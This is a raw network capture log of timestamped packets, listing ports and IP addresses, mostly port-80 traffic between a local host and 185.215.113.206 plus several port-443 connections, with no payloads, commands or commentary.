Nov 11, 2024 10:33:26.249202967 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249213934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249223948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249234915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249247074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249258995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249260902 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249272108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249283075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249290943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249299049 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249305010 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249322891 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249341011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249351978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249352932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249370098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249382019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249385118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249392033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249406099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249418020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249418020 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249429941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249443054 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249444008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249456882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249471903 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249475956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249481916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249484062 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249510050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249511003 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249537945 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249572992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249608994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249663115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249811888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249824047 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249835968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249846935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249860048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249881029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249887943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249896049 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249908924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249919891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249919891 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249933004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249946117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249946117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249962091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249970913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.249974012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249986887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.249989033 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250003099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250015974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250016928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250030041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250041962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250042915 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250056982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250056982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250072956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250097990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250104904 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250360012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250407934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250418901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250423908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250432014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250446081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250454903 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250469923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250492096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250571966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250583887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250596046 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250607014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250616074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250644922 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250679016 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250691891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250716925 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250730038 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250735044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250749111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250761032 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250772953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250786066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250797033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.250797987 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250806093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250828028 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.250858068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251019001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251030922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251068115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251068115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251104116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251116037 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251127005 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251138926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251151085 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251163006 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251192093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251244068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251256943 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251267910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251281023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251306057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251310110 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251322031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251332998 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251349926 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251358986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251372099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251396894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251399994 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251416922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251425982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251431942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251444101 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251455069 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251463890 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251482964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251487017 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251496077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251518965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251527071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251533031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251539946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251552105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251563072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251565933 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251580000 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251590967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251600027 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251604080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251616001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251626015 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251626968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251640081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251651049 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251651049 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251668930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251677990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251681089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251693010 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251693010 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251705885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251717091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251729012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251739025 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251739979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251754045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251769066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251780987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251781940 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251795053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251805067 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251807928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251821995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251826048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251843929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251848936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251858950 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251868010 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251878023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251897097 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251909018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251919031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251919985 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251931906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251944065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251955986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.251959085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251959085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.251982927 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252011061 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252023935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252037048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252048969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252074957 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252103090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252232075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252243996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252255917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252268076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252274036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252279043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252284050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252290010 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252291918 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252310038 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252321959 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252334118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252346039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252357960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252367973 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252371073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252383947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252396107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252399921 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252408028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252422094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252424955 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252432108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252437115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252444029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252471924 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252487898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252497911 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252501011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252511978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252532959 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252533913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252552986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252557993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252566099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252578020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252585888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252588987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252603054 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252614021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252618074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252645969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252662897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252675056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252679110 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252679110 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252687931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252698898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252711058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252712965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252723932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252736092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252737999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252748966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252760887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252760887 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252769947 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252774000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252785921 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.252799988 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.252826929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.294755936 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.300734997 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.303071976 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.303143024 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.304636955 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.315140009 CET	443	49855	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:26.318360090 CET	49855	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:26.318370104 CET	443	49855	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:26.318717957 CET	443	49855	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:26.320012093 CET	49855	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:26.320079088 CET	443	49855	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:26.330698967 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.330708981 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.331502914 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.331507921 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.331532955 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.331545115 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.331938028 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.331943989 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.341408014 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.341419935 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.341804981 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.343338013 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.343348026 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.345829964 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.348368883 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.348388910 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.349514008 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.349905968 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.351306915 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.351383924 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.352956057 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.352956057 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.352971077 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.352991104 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.364959955 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.365011930 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.365382910 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.367182016 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.367194891 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.369255066 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.369266033 CET	49855	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:26.369273901 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.369273901 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.376483917 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.376512051 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.376526117 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.376621008 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.376621008 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.376641035 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.376964092 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.378611088 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.378627062 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.379401922 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.379410982 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.379842043 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.396440029 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.406883955 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.406883955 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.406892061 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.406907082 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.412760019 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.412772894 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.412935972 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.413211107 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.413222075 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.413388014 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.413393021 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.413543940 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.413641930 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.413647890 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.414115906 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.414117098 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.414130926 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.414175034 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.414181948 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.414186954 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.414226055 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.414241076 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.420377016 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.420541048 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.420670033 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.420751095 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.420824051 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.420824051 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.420841932 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.420851946 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.423243999 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.423355103 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.423355103 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.423604012 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.423610926 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.428442001 CET	49867	443	192.168.2.5	13.107.246.45
